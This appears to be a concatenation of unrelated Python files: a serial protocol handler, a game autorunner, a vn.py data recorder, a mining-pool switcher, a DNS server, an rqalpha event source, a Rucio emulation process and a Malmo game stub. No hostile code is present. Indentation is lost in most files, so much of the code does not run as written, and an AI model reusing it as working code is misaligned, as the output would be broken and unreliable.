id = packet[2]
payload = self.unescape(packet[3:-1])
# Extract and verify CRC
crc = payload.pop(-1)
crc_calc = self.calc_crc(payload)[0]
if crc != crc_calc:
raise CRCError("CRC mismatch")
return {"len": length, "id": id, "payload": payload}
@staticmethod
def calc_crc(bts):
"""
Calculate CRC-8 value of input bytes.
:param bts: sequence of bytes, type bytes or bytearray
:return: single byte CRC-8, type bytes
"""
crc8 = crcmod.predefined.Crc("crc-8")
crc8.update(bts)
return crc8.digest()
def read_packet(self, b):
"""
Read packet byte by byte. Called when new byte is available.
:param b: incoming byte
"""
if len(b) < 1:
return
if self.byte_count > 0 and time() - self.packet_start_time > self.packet_timeout:
self.byte_count = 0
self.esc_active = False
return
b = b[0]
# Wait for START
if self.byte_count == 0:
if b == self.START:
self.current_len = None
self.current_id = None
self.current_payload = bytearray()
self.byte_count += 1
self.packet_start_time = time()
# Length byte
elif self.byte_count == 1:
self.current_len = b
self.byte_count += 1
# Id byte
elif self.byte_count == 2:
self.current_id = b
self.byte_count += 1
# Payload bytes
elif self.byte_count >= 3:
if not self.esc_active:
if b == self.ESC:
self.esc_active = True
self.byte_count += 1
return
if b == self.END:
self.byte_count += 1
# End of frame, verify
crc_received = bytes([self.current_payload[-1]])
payload = self.current_payload[0:-1]
crc_calculated = self.calc_crc(payload)
if self.current_len == self.byte_count and crc_received == crc_calculated:
callback_processed = self.process_callback(self.current_id, payload)
reply_processed = self.process_reply(self.current_id, payload)
if not callback_processed and not reply_processed:
try:
self.received_queue.put((self.current_id, payload), block=False)
except Full:
pass
else:
pass
self.byte_count = 0
return
else:
self.current_payload.append(b)
self.byte_count += 1
else:
self.current_payload.append(b)
self.byte_count += 1
self.esc_active = False
if self.byte_count > self.current_len or time() - self.packet_start_time > self.packet_timeout:
# Reset
self.byte_count = 0
self.esc_active = False
def receive_worker(self):
"""
Receive worker function. Reads serial port byte by byte.
"""
while self.is_open:
if self.serial_alive:
try:
b = self.serial.read() # blocks until a byte is available or timeout set in serial constructor
except SerialException:
self.serial_alive = False
self.restart()
else:
self.read_packet(b)
self.update_awaiting_reply()
def send_worker(self):
"""
Send worker function. Takes frame from send queue and sends it over serial.
"""
while self.is_open:
if self.serial_alive:
try:
id, frame = self.send_queue.get(block=True, timeout=1e-1)
except Empty:
pass
else:
try:
self.serial.write(frame)
except SerialException:
self.serial_alive = False
self.restart()
def restart(self):
"""
Close and reopen the serial port.
"""
self.logger.warning("Serial port closed unexpectedly. Trying to reopen...")
while self.is_open:
try:
self.serial.close()
self.serial.open()
except SerialException:
pass
else:
self.serial_alive = True
self.logger.warning("Reopened serial port.")
break
sleep(1)
def set_callback(self, id, callback):
"""
Set a function to be called when a packet with certain id is received.
Arguments passed to callback function: payload
:param id: packet id
:param callback: function to call
"""
self.callbacks[id] = callback
def clear_callback(self, id):
"""
Remove callback function at certain message id.
:param id: packet id
"""
self.callbacks.pop(id, None)
def process_callback(self, id, payload):
"""
Called when new packet is received.
Check if callback for packet id is set. If true, put the callback function in callback queue.
:param id: packed id
:param payload: packet payload
:return True if callback is registered, False otherwise
"""
try:
cb = self.callbacks[id]
except KeyError:
return False
else:
try:
self.callback_queue.put((cb, payload), block=False)
except Full:
pass
return True
def callback_worker(self):
"""
Call functions from callback queue. Pass packet id, len, payload as arguments.
"""
while self.is_open:
try:
callback, payload = self.callback_queue.get(block=True, timeout=1e-1)
except Empty:
pass
else:
try:
callback(payload)
except Exception as e:
self.logger.error("Exception occurred during callback '{}': {}".format(callback.__name__, e))
def update_awaiting_reply(self):
"""
Update the list of sent packets waiting for reply
"""
items_to_pop = []
for id, (time_sent, timeout, frame, tries_left, replied) in self.awaiting_reply.items():
if not replied:
if time() - time_sent > timeout:
if tries_left <= 0:
items_to_pop.append(id)
self.logger.warning("Reply for packet id {} not received.".format(id))
else:
try:
self.send_queue.put((id, frame), block=False)
except Full:
pass
else:
self.awaiting_reply[id] = [time(), timeout, frame, tries_left - 1, replied]
for i in items_to_pop:
self.awaiting_reply.pop(i)
def process_reply(self, id, payload):
try:
self.awaiting_reply[id][4] = payload
except KeyError:
return False
else:
return True
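# Editor's self-test sketch (hedged): exercises the frame()/unframe() round trip without
# opening a port. serial_for_url("loop://", do_not_open=True) is assumed to be available in
# pyserial; open() is never called here, so no worker threads are started.
if __name__ == "__main__":
    import serial as _pyserial
    ss = SimpleSerial(serial=_pyserial.serial_for_url("loop://", do_not_open=True))
    framed = ss.frame(7, b"ABC")
    print(framed.hex())
    decoded = ss.unframe(framed)
    print(decoded["id"], bytes(decoded["payload"]))  # expected: 7 b'ABC'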
|
autorunner.py
|
import random
from multiprocessing import Process
from parser import drawState, from_python
from states import State, JoinResult
from orbiter import OrbiterStrategy
from swarmer import SwarmerStrategy
from interaction import send2
from orbit_util import sign, trace_orbit
_, [p1, p2] = send2([1, 0])
def survivor_strategy(state):
pid = state[2][1]
actions = []
my_ships = []
enemy_ships = []
for obj in state[3][2]:
if obj[0][0] == pid:
print(obj)
my_ships.append(obj)
else:
enemy_ships.append(obj)
for my_ship in my_ships:
my_pos = my_ship[0][2]
thrust = (-sign(my_pos[0]), 0) if abs(my_pos[0]) > abs(my_pos[1]) else (0, -sign(my_pos[1]))
actions.append([0, my_ship[0][1], thrust])
if enemy_ships:
enemy_ship = random.choice(enemy_ships)
enemy_pos = enemy_ship[0][2]
enemy_speed = enemy_ship[0][3]
actions.append([2, my_ship[0][1], (enemy_pos[0] + enemy_speed[0], enemy_pos[1] + enemy_speed[1]), 5])
return actions
def id_strategy(state):
print('= ID STRATEGY =')
State.parse(state)
print('===============')
return []
def die_strategy(state):
print('=====HANG======')
st = State.parse(state)
ship = st.player_ships(st.me)[0]
print('===============')
return [ship.do_explode()]
def move_towards(x, vx, tx):
"""
x - where we are; vx - our speed; tx - where we want to be.
Returns optimal do_thrust power.
    Speeds up only if we can later stop without overshooting.
    Slows down if not slowing down would result in overshooting.
"""
if x == tx:
return sign(vx)
s = sign(tx - x)
if s == -1:
x, vx, tx = -x, -vx, -tx
def can_stop(x, vx):
return x + vx * (vx - 1) // 2 <= tx
if can_stop(x + vx + 1, vx + 1):
return -s
elif can_stop(x + vx, vx):
return 0
else:
return s
assert move_towards(1, 0, 2) == -1
assert move_towards(1, 1, 2) == 0
assert move_towards(1, 3, 2) == 1
assert move_towards(1, 3, 7) == 0
assert move_towards(1, 3, 6) == 1
assert move_towards(1, 3, 20) == -1
class RotatingStrategy(object):
def __init__(self):
self.field1 = []
self.field2 = {}
def apply(self, state):
self.field1.append('blablabla')
self.field2['abc'] = 'def'
print('=====ROTATE====')
st = State.parse(state)
print(st)
ship = st.player_ships(st.me)[0]
mid = (st.field_size + st.planet_size) / 2
x, y = -ship.y, ship.x
n = max(abs(x), abs(y))
x, y = mid * x / n, mid * y / n
dx = move_towards(ship.x, ship.vx, x)
dy = move_towards(ship.y, ship.vy, y)
print('===============')
if (dx or dy) and ship.fuel:
return [ship.do_thrust(dx, dy)]
else:
return []
def player(id, key, strategy):
res = send2([2, key, [103652820, 192496425430]])
joinres = JoinResult.parse(res)
total = joinres.budget
fake_state = from_python(
[6, [0, 10, -1, id, 0, 2, [], [], 4, [], [256, 1, [total, 1, 64], [16, 128], []], [], []], 9, []])
print(f'Send 2 res: {res}, available: {total}')
initial_stats = strategy.pick_stats(res)
state = send2([3, key, initial_stats])
images = []
T = 0
while True:
T += 1
state = send2([4, key, strategy.apply(state)])
# images.append(drawState(fake_state, from_python(state))[1])
# intermediate gif saves
# if T % 10 == 0:
# images[0].save(f'player{id}.gif', save_all=True, append_images=images[1:])
if state[1] == 2:
print('done')
break
# images[0].save(f'player{id}.gif', save_all=True, append_images=images[1:])
# print(send2([122, 203, 410, 164, 444, 484, 202, 77, 251, 56, 456, 435, 28, 329, 257, 265, 501, 18, 190, 423, 384, 434, 266, 69, 34, 437, 203, 152, 160, 425, 245, 428, 99, 107, 192, 372, 346, 344, 169, 478, 393, 502, 201, 497, 313, 32, 281, 510, 436, 22, 237, 80, 325, 405, 184, 358, 57, 276, 359, 189, 284, 277, 198, 244]))
# strategy2 = SwarmerStrategy(printships=False)
strategy1 = OrbiterStrategy(do_laser=True, printships=True, duplicate=False)
strategy2 = OrbiterStrategy(do_laser=False, printships=True, duplicate=True)
p1 = Process(target=player, args=p1 + [strategy1])
p2 = Process(target=player, args=p2 + [strategy2])
p1.start()
p2.start()
p1.join()
p2.join()
|
engine.py
|
""""""
import sys
from threading import Thread
from queue import Queue, Empty
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.constant import Exchange
from vnpy.trader.object import (
SubscribeRequest,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import EVENT_TICK, EVENT_CONTRACT
from vnpy.trader.utility import load_json, save_json, BarGenerator
from vnpy.trader.database import database_manager
from vnpy.app.spread_trading.base import EVENT_SPREAD_DATA, SpreadData
APP_NAME = "DataRecorder"
EVENT_RECORDER_LOG = "eRecorderLog"
EVENT_RECORDER_UPDATE = "eRecorderUpdate"
EVENT_RECORDER_EXCEPTION = "eRecorderException"
class RecorderEngine(BaseEngine):
""""""
setting_filename = "data_recorder_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.queue = Queue()
self.thread = Thread(target=self.run)
self.active = False
self.tick_recordings = {}
self.bar_recordings = {}
self.bar_generators = {}
self.load_setting()
self.register_event()
self.start()
self.put_event()
def load_setting(self):
""""""
setting = load_json(self.setting_filename)
self.tick_recordings = setting.get("tick", {})
self.bar_recordings = setting.get("bar", {})
def save_setting(self):
""""""
setting = {
"tick": self.tick_recordings,
"bar": self.bar_recordings
}
save_json(self.setting_filename, setting)
def run(self):
""""""
while self.active:
try:
task = self.queue.get(timeout=1)
task_type, data = task
if task_type == "tick":
database_manager.save_tick_data([data])
elif task_type == "bar":
                    self.write_log("1-minute bar inserted into database")
database_manager.save_bar_data([data])
except Empty:
continue
except Exception:
self.active = False
info = sys.exc_info()
event = Event(EVENT_RECORDER_EXCEPTION, info)
self.event_engine.put(event)
def close(self):
""""""
self.active = False
        if self.thread.is_alive():
self.thread.join()
def start(self):
""""""
self.active = True
self.thread.start()
def add_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.bar_recordings:
            self.write_log(f"Already in bar recording list: {vt_symbol}")
return
if Exchange.LOCAL.value not in vt_symbol:
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
                self.write_log(f"Contract not found: {vt_symbol}")
return
self.bar_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
else:
self.tick_recordings[vt_symbol] = {}
self.save_setting()
self.put_event()
        self.write_log(f"Added bar recording: {vt_symbol}")
def add_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.tick_recordings:
            self.write_log(f"Already in tick recording list: {vt_symbol}")
return
# For normal contract
if Exchange.LOCAL.value not in vt_symbol:
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
                self.write_log(f"Contract not found: {vt_symbol}")
return
self.tick_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
# No need to subscribe for spread data
else:
self.tick_recordings[vt_symbol] = {}
self.save_setting()
self.put_event()
        self.write_log(f"Added tick recording: {vt_symbol}")
def remove_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.bar_recordings:
            self.write_log(f"Not in bar recording list: {vt_symbol}")
return
self.bar_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
        self.write_log(f"Removed bar recording: {vt_symbol}")
def remove_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.tick_recordings:
            self.write_log(f"Not in tick recording list: {vt_symbol}")
return
self.tick_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
        self.write_log(f"Removed tick recording: {vt_symbol}")
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
self.event_engine.register(
EVENT_SPREAD_DATA, self.process_spread_event)
def update_tick(self, tick: TickData):
""""""
if tick.vt_symbol in self.tick_recordings:
self.record_tick(tick)
if tick.vt_symbol in self.bar_recordings:
bg = self.get_bar_generator(tick.vt_symbol)
bg.update_tick(tick)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.update_tick(tick)
def process_contract_event(self, event: Event):
""""""
contract = event.data
vt_symbol = contract.vt_symbol
if (vt_symbol in self.tick_recordings or vt_symbol in self.bar_recordings):
self.subscribe(contract)
def process_spread_event(self, event: Event):
""""""
spread: SpreadData = event.data
tick = spread.to_tick()
# Filter not inited spread data
if tick.datetime:
self.update_tick(tick)
def write_log(self, msg: str):
""""""
event = Event(
EVENT_RECORDER_LOG,
msg
)
self.event_engine.put(event)
def put_event(self):
""""""
tick_symbols = list(self.tick_recordings.keys())
tick_symbols.sort()
bar_symbols = list(self.bar_recordings.keys())
bar_symbols.sort()
data = {
"tick": tick_symbols,
"bar": bar_symbols
}
event = Event(
EVENT_RECORDER_UPDATE,
data
)
self.event_engine.put(event)
def record_tick(self, tick: TickData):
""""""
task = ("tick", copy(tick))
self.queue.put(task)
def record_bar(self, bar: BarData):
""""""
task = ("bar", copy(bar))
self.queue.put(task)
def get_bar_generator(self, vt_symbol: str):
""""""
bg = self.bar_generators.get(vt_symbol, None)
if not bg:
bg = BarGenerator(self.record_bar)
self.bar_generators[vt_symbol] = bg
return bg
def subscribe(self, contract: ContractData):
""""""
req = SubscribeRequest(
symbol=contract.symbol,
exchange=contract.exchange
)
self.main_engine.subscribe(req, contract.gateway_name)
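# A minimal usage sketch (an assumption, not part of this module): the recorder
# is normally created by vn.py's app framework, but it can be wired up manually
# against a MainEngine/EventEngine pair. The contract symbol is illustrative.
if __name__ == "__main__":
    event_engine = EventEngine()
    main_engine = MainEngine(event_engine)
    recorder = RecorderEngine(main_engine, event_engine)
    recorder.add_tick_recording("rb2110.SHFE")  # hypothetical vt_symbol
    recorder.add_bar_recording("rb2110.SHFE")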
|
when_switch.py
|
'''
listens for pool switch command
'''
import datetime
from threading import Thread
from queue import Queue
from colorama import Fore
#from pika.exceptions import ChannelClosed
from helpers import antminerhelper
from helpers.queuehelper import QueueName
from domain.mining import MinerCommand, MinerAccessLevel
from domain.logging import MinerLog
from backend.fcmapp import Component
COMPONENTACTION = Component('action')
def enthread(target, args):
    '''Run target(*args) in a background thread; returns a queue that receives its result.'''
thread_queue = Queue()
def wrapper():
thread_queue.put(target(*args))
thread = Thread(target=wrapper)
thread.start()
return thread_queue
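# Example (a sketch, not part of this module): the queue returned by enthread
# yields the target's return value once it finishes, so .get() doubles as a join:
#   q = enthread(target=pow, args=(2, 10))
#   result = q.get()  # blocks until pow(2, 10) returns -> 1024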
def when_switch(channel, method, properties, body):
'''Handler for pool switching'''
try:
print("[{0}] Received switch command".format(COMPONENTACTION.app.now()))
minermsg = COMPONENTACTION.app.messagedecodeminercommand(body)
qswitch = enthread(target=doswitch, args=(minermsg.miner, minermsg.command, ))
qswitch.get()
COMPONENTACTION.app.bus.acknowledge(COMPONENTACTION.listeningqueue, method.delivery_tag)
except BaseException as ex:
COMPONENTACTION.app.bus.reject(COMPONENTACTION.listeningqueue, method.delivery_tag)
print(Fore.RED + 'Could not run switch command: ' + COMPONENTACTION.app.exceptionmessage(ex))
def doswitch(miner, command: MinerCommand):
'''switch miner pool'''
if command.command:
txtalert = "{0} {1}".format(miner.name, command.command)
print(Fore.YELLOW + txtalert)
#check if privileged mode, raise alert if not in privileged mode!
access = COMPONENTACTION.app.antminer.getaccesslevel(miner)
if access == MinerAccessLevel.Restricted:
miner.set_ftp_port(COMPONENTACTION.app.configuration.get('discover.sshport'))
access = COMPONENTACTION.app.antminer.setminertoprivileged(miner)
if access == MinerAccessLevel.Restricted:
                raise Exception('Could not set miner {0} to privileged'.format(miner.name))
antminerhelper.switch(miner, command.parameter)
COMPONENTACTION.app.alert(txtalert)
log = MinerLog()
log.createdate = datetime.datetime.utcnow()
log.minerid = miner.key()
log.minername = miner.name
log.action = txtalert
COMPONENTACTION.app.log_mineractivity(log)
COMPONENTACTION.app.send(QueueName.Q_MONITORMINER, COMPONENTACTION.app.messageencode(miner))
def main():
COMPONENTACTION.listeningqueue = COMPONENTACTION.app.subscribe(QueueName.Q_SWITCH, when_switch, no_acknowledge=False)
COMPONENTACTION.app.listen(COMPONENTACTION.listeningqueue)
if __name__ == "__main__":
main()
|
server.py
|
#!/usr/bin/env python
# Flirble DNS Server
# Main server
#
# Copyright 2016 Chris Luke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os, logging
log = logging.getLogger(os.path.basename(__file__))
import sys, threading, time
import SocketServer
import FlirbleDNSServer as fdns
"""Default local bind address."""
ADDRESS = '::'
"""Default local bind port."""
PORT = 8053
"""
The DNS Server.
Initializes various things then spawns a thread each for the UDP and TCP
services.
"""
class Server(object):
"""The list of SocketServer instances to launch threads for."""
servers = None
"""
Initializes the DNS server.
Creates a Geo object with the path to the GeoIP database.
Creates a Request handler with the zones and servers files, and the
Geo reference.
Then creates TCP and UDP servers, which opens sockets and binds them
to the given address and port.
@param rdb FlirbleDNSServer.Data The database object to use.
@param address str The local address to bind to. Default is "::".
    @param port int The local port number to bind to. Default is 8053.
@param zones str The zones table to fetch zone data from.
@param server str The servers table to fetch server data from.
@param geodb str The Maxmind GeoIP database that the Geo class should
load. Default is None.
"""
def __init__(self, rdb, address=ADDRESS, port=PORT, zones=None,
servers=None, geodb=None):
super(Server, self).__init__()
log.debug("Initializing Geo module.")
geo = fdns.Geo(geodb=geodb)
log.debug("Initializing Request module.")
request = fdns.Request(rdb=rdb, zones=zones, servers=servers, geo=geo)
self.servers = []
log.debug("Initializing UDP server for '%s' port %d." %
(address, port))
self.servers.append(fdns.UDPServer((address, port),
fdns.UDPRequestHandler, request))
log.debug("Initializing TCP server for '%s' port %d." %
(address, port))
self.servers.append(fdns.TCPServer((address, port),
fdns.TCPRequestHandler, request))
self.request = request
self.geo = geo
self.rdb = rdb
"""
Starts the threads and runs the servers. Returns once all services have
been stopped, either by Exception or ^C.
"""
def run(self):
log.debug("Starting TCP and UDP servers.")
# Start the threads.
for s in self.servers:
thread = threading.Thread(target=s.serve_forever)
thread.daemon = True
thread.start()
log.debug("DNS server started.")
try:
while True:
# This is the idle loop.
time.sleep(30)
self.request.idle()
except KeyboardInterrupt:
pass
finally:
log.debug("Shutting down DNS server.")
for s in self.servers:
s.shutdown()
self.rdb.stop()
self.request = None
self.geo = None
self.servers = None
self.rdb = None
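# A minimal usage sketch (assumptions: `rdb` is an already-constructed
# FlirbleDNSServer.Data instance and the GeoIP path is illustrative):
#
#   server = Server(rdb, address='::', port=8053,
#                   zones='zones', servers='servers',
#                   geodb='/usr/share/GeoIP/GeoLite2-City.mmdb')
#   server.run()  # blocks until ^C, then shuts both listeners down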
|
event_source.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2017 Ricequant, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import time
from threading import Thread
from six.moves.queue import Queue, Empty
from rqalpha.interface import AbstractEventSource
from rqalpha.environment import Environment
from rqalpha.utils.logger import system_log
from rqalpha.events import Event, EVENT
from rqalpha.utils import rq_json
from .utils import get_realtime_quotes, order_book_id_2_tushare_code, is_holiday_today, is_tradetime_now
from . import data_board
class RealtimeEventSource(AbstractEventSource):
MARKET_DATA_EVENT = "RealtimeEventSource.MARKET_DATA_EVENT"
def __init__(self, fps):
self._env = Environment.get_instance()
self.fps = fps
self.event_queue = Queue()
self.before_trading_fire_date = datetime.date(2000, 1, 1)
self.after_trading_fire_date = datetime.date(2000, 1, 1)
self.settlement_fire_date = datetime.date(2000, 1, 1)
self.quotation_engine_thread = Thread(target=self.quotation_worker)
self.quotation_engine_thread.daemon = True
self.clock_engine_thread = Thread(target=self.clock_worker)
self.clock_engine_thread.daemon = True
def set_state(self, state):
persist_dict = rq_json.convert_json_to_dict(state.decode('utf-8'))
self.before_trading_fire_date = persist_dict['before_trading_fire_date']
self.after_trading_fire_date = persist_dict['after_trading_fire_date']
self.settlement_fire_date = persist_dict['settlement_fire_date']
def get_state(self):
return rq_json.convert_dict_to_json({
"before_trading_fire_date": self.before_trading_fire_date,
"after_trading_fire_date": self.after_trading_fire_date,
"settlement_fire_date": self.settlement_fire_date,
}).encode('utf-8')
def quotation_worker(self):
while True:
if not is_holiday_today() and is_tradetime_now():
order_book_id_list = sorted([instruments.order_book_id for instruments in self._env.data_proxy.all_instruments("CS", self._env.trading_dt)])
code_list = [order_book_id_2_tushare_code(code) for code in order_book_id_list]
try:
data_board.realtime_quotes_df = get_realtime_quotes(code_list)
except Exception as e:
system_log.exception("get_realtime_quotes fail")
continue
time.sleep(1)
def clock_worker(self):
while True:
# wait for the first data ready
if not data_board.realtime_quotes_df.empty:
break
time.sleep(0.1)
while True:
time.sleep(self.fps)
if is_holiday_today():
time.sleep(60)
continue
dt = datetime.datetime.now()
if dt.strftime("%H:%M:%S") >= "08:30:00" and dt.date() > self.before_trading_fire_date:
self.event_queue.put((dt, EVENT.BEFORE_TRADING))
self.before_trading_fire_date = dt.date()
elif dt.strftime("%H:%M:%S") >= "15:10:00" and dt.date() > self.after_trading_fire_date:
self.event_queue.put((dt, EVENT.AFTER_TRADING))
self.after_trading_fire_date = dt.date()
elif dt.strftime("%H:%M:%S") >= "15:10:00" and dt.date() > self.settlement_fire_date:
self.event_queue.put((dt, EVENT.SETTLEMENT))
self.settlement_fire_date = dt.date()
if is_tradetime_now():
self.event_queue.put((dt, EVENT.BAR))
def events(self, start_date, end_date, frequency):
running = True
self.clock_engine_thread.start()
self.quotation_engine_thread.start()
while running:
real_dt = datetime.datetime.now()
while True:
try:
dt, event_type = self.event_queue.get(timeout=1)
break
except Empty:
continue
system_log.debug("real_dt {}, dt {}, event {}", real_dt, dt, event_type)
yield Event(event_type, calendar_dt=real_dt, trading_dt=dt)
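# A wiring sketch (an assumption, not part of this module): an rqalpha mod
# would typically install this event source from its start_up hook, e.g.
#
#   class RealtimeTradeMod(AbstractMod):
#       def start_up(self, env, mod_config):
#           env.set_event_source(RealtimeEventSource(fps=mod_config.fps))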
|
ucprocess.py
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Ralph Vigne, <ralph.vigne@cern.ch>, 2013
import fcntl
import json
import os
import resource
import signal
import sys
import threading
import time
import traceback
from pystatsd import Client
class UCProcess(object):
def get_open_fds(self):
fds = []
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
for fd in range(0, soft):
try:
fcntl.fcntl(fd, fcntl.F_GETFD)
except IOError:
continue
fds.append(fd)
return len(fds)
def __init__(self, cfg, mod_list, stop_event):
self.pid = os.getpid()
self.cfg = cfg
self.mod_list = mod_list
self.stop_event = stop_event
self.uc_threads = dict()
self.update = cfg['global']['update_interval']
self.received_stop = False
        # Instantiating logging
self.cs = None
if 'carbon' in self.cfg['global']:
try:
self.cs = Client(host=self.cfg['global']['carbon']['CARBON_SERVER'], port=self.cfg['global']['carbon']['CARBON_PORT'], prefix=self.cfg['global']['carbon']['USER_SCOPE'])
except Exception, e:
print '!! Unable to connect to Carbon-Server !!'
print e
print traceback.format_exc()
# Preparing all UCs
self.uc_array = dict()
for module_name in self.mod_list:
try:
                print '= (PID: %s) Instantiating module \'%s\' ... ' % (self.pid, module_name)
                obj = __import__('rucio.tests.emulation.usecases.%s' % module_name)  # Not sure why this is needed, but couldn't find another working way
for mn in ['tests', 'emulation', 'usecases', module_name, 'UseCaseDefinition']:
obj = getattr(obj, mn)
# Applying multiplier to Hz rates
                print '= (PID: %s) Importing successful. Executing setup ...' % self.pid
for uc in self.cfg[module_name]:
if uc == 'context':
continue
self.cfg[module_name][uc] *= self.cfg['global']['multiplier']
obj = obj(self.cfg[module_name], self.cs) # Instanciate UC object
print '= (PID: %s) Initialized frequencies: %s' % (self.pid, obj.get_intervals())
self.uc_array[module_name] = obj
except Exception, e:
print '!! Error importing module \'%s\' !!' % module_name
print traceback.format_exc()
def run(self):
def signal_handler(signal, frame):
print '= (PID: %s) [%s] received SIGTERM' % (self.pid, time.strftime('%H:%M:%S', time.localtime()))
self.received_stop = True
try:
signal.signal(signal.SIGTERM, signal_handler)
except ValueError:
pass # Happens when using threads instead of sub processes
# Starting all defined use cases
self.pid = os.getpid()
try:
for uc in self.uc_array.items():
run = getattr(uc[1], 'run')
t = threading.Thread(target=run, args=[self.cfg['global'], self.stop_event])
                t.daemon = True
t.start()
self.uc_threads[uc] = t
print '= (PID: %s) Starting up thread for %s ... OK' % (self.pid, uc[0])
except Exception, e:
print e
print traceback.format_exc()
try:
while not self.stop_event.is_set():
ta = threading.active_count()
of = self.get_open_fds()
if len(self.mod_list):
self.cs.gauge('emulator.counts.threads.%s' % self.mod_list[0], ta)
self.cs.gauge('emulator.counts.files.%s' % self.mod_list[0], of)
print '= (PID: %s) File count: %s' % (self.pid, self.get_open_fds())
print '= (PID: %s) Thread count: %s' % (self.pid, threading.active_count())
self.stop_event.wait(self.update)
try:
with open('/opt/rucio/etc/emulation.cfg') as f:
cfg = json.load(f)
for mod in cfg['global']['modules']:
with open('/opt/rucio/etc/%s.cfg' % mod) as f:
mcfg = json.load(f)
cfg.update(mcfg)
except Exception, e:
print 'Unable to check configuration for updates. Retry in %s seconds ...' % self.update
print e
continue
for mod in self.mod_list:
print '= (PID: %s) Checking context of %s for updates ...' % (self.pid, mod)
# Check frequencies
ups = {}
for uc in self.cfg[mod]:
if uc != 'context':
cfg[mod][uc] *= cfg['global']['multiplier']
if self.cfg[mod][uc] != cfg[mod][uc]:
ups[uc] = cfg[mod][uc]
self.cfg[mod][uc] = cfg[mod][uc]
if len(ups.keys()):
self.uc_array[mod].update_ucs(ups)
# Check context variables
try:
self.diff_context(self.cfg[mod]['context'], cfg[mod]['context'], ['context'], self.uc_array[mod])
except Exception, e:
                        print '!! ERROR !! Error while updating context: %s' % e
# Updated local cfg
self.cfg[mod]['context'] = cfg[mod]['context']
self.update = cfg['global']['update_interval']
# Reporting cfg - setting to graphite
for mod in cfg:
if mod == 'global':
self.cs.gauge('emulator.cfg.multiplier', cfg['global']['multiplier'])
self.cs.gauge('emulator.cfg.update_interval', cfg['global']['update_interval'])
else:
for frequ in cfg[mod]:
if frequ == 'context':
self.report_context(cfg[mod]['context'], 'emulator.cfg.%s.context' % mod)
else:
self.cs.gauge('emulator.cfg.%s.frequency.%s' % (mod, frequ), cfg[mod][frequ])
self.stop()
except Exception, e:
print e
print traceback.format_exc()
except KeyboardInterrupt:
pass
def stop(self):
print '= (PID: %s) Stopping threads ....' % self.pid
for mod in self.uc_threads.items():
print '= (PID: %s) Stopping module %s' % (self.pid, mod[0])
mod[1].join()
if self.received_stop:
print '= (PID: %s) Stopped successfully (Return Code: 0)' % self.pid
sys.exit(0)
else:
print '= (PID: %s) Stopped successfully (Return Code: 1)' % self.pid
sys.exit(1)
def diff_context(self, current, new, key_chain, uc):
nk = new.keys()
for key in current: # Check if keys are changed
if key in nk:
if type(current[key]) == dict:
self.diff_context(current[key], new[key], key_chain + [key], uc)
else:
if current[key] != new[key]:
print key_chain, current[key], new[key]
uc.update_ctx((key_chain + [key])[1:], new[key])
def report_context(self, ctx, prefix):
for key in ctx:
if type(ctx[key]) == dict:
self.report_context(ctx[key], '%s.%s' % (prefix, key))
elif type(ctx[key]) == unicode:
if ctx[key] == 'True':
self.cs.gauge('%s.%s' % (prefix, key), 1)
elif ctx[key] == 'False':
self.cs.gauge('%s.%s' % (prefix, key), 0)
elif isinstance(ctx[key], (int, long, float)):
self.cs.gauge('%s.%s' % (prefix, key), ctx[key])
else:
# print '%s\tCannot report\t%s.%s\t(type:\t%s)\t%s' % (now, prefix, key, type(ctx[key]), ctx[key])
pass
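# Example (a sketch): diff_context walks both dicts in parallel and calls
# uc.update_ctx() for every changed leaf, with the key chain minus the leading
# 'context' element, e.g.
#   old = {'context': {'files': {'size': 100}}}
#   new = {'context': {'files': {'size': 200}}}
#   self.diff_context(old['context'], new['context'], ['context'], uc)
#   -> uc.update_ctx(['files', 'size'], 200)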
|
game.py
|
import MalmoPython
import os
import random
import threading
import time
import malmoutils
import pyson.runtime
from jason_malmo.actions import actions
from jason_malmo.agent import Agent
from jason_malmo.exceptions import NoAgentsException
from jason_malmo.tasks import TaskManager
class Game:
"""Game main class.
This class may be instantiated to run a Malmo Mission using Jason Agents.
Attributes:
name (str): Match's name.
world (str): World's generator string. `Flat world generator`_.
tasks (:obj:`jason_malmo.tasks.TaskManager`): Tasks Manager.
.. _Flat world generator:
http://minecraft.tools/en/flat.php
"""
def __init__(self, name):
self.name = name
self.world = '3;7,220*1,5*3,2;3;,biome_1'
self.tasks = TaskManager()
self._my_mission = None
self._client_pool = None
self._agents = []
